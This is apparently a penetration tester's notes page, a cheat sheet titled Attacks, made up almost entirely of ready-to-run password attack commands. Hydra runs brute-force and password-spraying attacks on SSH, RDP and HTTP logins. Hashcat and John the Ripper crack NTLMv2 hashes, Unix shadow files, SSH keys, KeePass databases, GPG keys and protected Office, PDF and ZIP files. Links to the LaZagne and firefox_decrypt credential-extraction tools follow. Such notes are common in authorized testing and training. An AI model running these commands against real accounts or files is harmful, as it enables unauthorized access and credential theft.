Attacks

Identify

Some Lists

/usr/share/wordlists/rockyou.txt
/usr/share/metasploit-framework/data/wordlists/unix_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
/usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-files.txt
/usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt

SSH

hydra -l root -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://IP
hydra -L /usr/share/wordlists/dirb/others/names.txt -P /path/to/wordlist.txt ssh://10.10.x.x -v

# Cred spray
hydra -l user -p pass -M servers.txt ssh

# ssh2john
ssh2john id_rsa > ssh.hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
chmod 600 id_rsa
ssh -i id_rsa user@host

RDP

# Spray
hydra -L /usr/share/wordlists/dirb/others/names.txt -p "Password123" rdp://IP

HTTP

# Brute Forcing Basic Auth
hydra -l admin -P /usr/share/wordlists/rockyou.txt http-get://IP
Authorization: Basic base64("user:pass")

# Post Login Form
hydra -l user -P /usr/share/wordlists/rockyou.txt IP http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed."

NTLM

hashcat -m 5600 sam.hash /usr/share/wordlists/rockyou.txt
john sam.hash --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt

Unshadow

# Takes both files and combines them into a format compatible for cracking
unshadow passwd shadow > unshadow.hash
john unshadow.hash --wordlist=/usr/share/wordlists/rockyou.txt

Office

office2john secret.docx > office.hash
john office.hash --wordlist=/usr/share/wordlists/rockyou.txt

KeePass

keepass2john Database.kdbx > keepass.hash
hashcat --help | grep -i "KeePass"
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

If John Errors:
./keepass4brute.sh /root/recovery.kdbx /usr/share/wordlists/rockyou.txt

PGP Private Key

# Convert GPG key
gpg2john file.asc > gpg.hash

# Crack the password for the GPG key
john --wordlist=/usr/share/wordlists/rockyou.txt gpg.hash

# Once the password is retrieved, import the GPG key to your keyring
gpg --import file.asc

# Decrypt the protected file
gpg --decrypt credential.pgp

PDF

pdf2john
apt-get install pdfcrack
pdfcrack document.pdf -w /usr/share/wordlists/rockyou.txt

ZIP

# ZIP
zip2john files.zip > zip.hash
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=zip
7z x files.zip

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt files.zip

# WinRAR
rar2john files.zip > zip.hash

RSA

https://www.dcode.fr/rsa-cipher
git clone https://github.com/Ganapati/RsaCtfTool.git

Other

GitHub - unode/firefox_decrypt: Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox™, Waterfox™, Thunderbird®, SeaMonkey®) profilesGitHub

GitHub - AlessandroZ/LaZagne: Credentials recovery projectGitHub

PreviousTTYs NextWindown Enumeration

Last updated 6 months ago

hashtagIdentify

hashtagSome Lists

hashtagSSH

hashtagRDP

hashtagHTTP

hashtagNTLM

hashtagUnshadow

hashtagOffice

hashtagKeePass

hashtagPGP Private Key

hashtagPDF

hashtagZIP

hashtagRSA

hashtagOther

Identify

Some Lists

SSH

RDP

HTTP

NTLM

Unshadow

Office

KeePass

PGP Private Key

PDF

ZIP

RSA

Other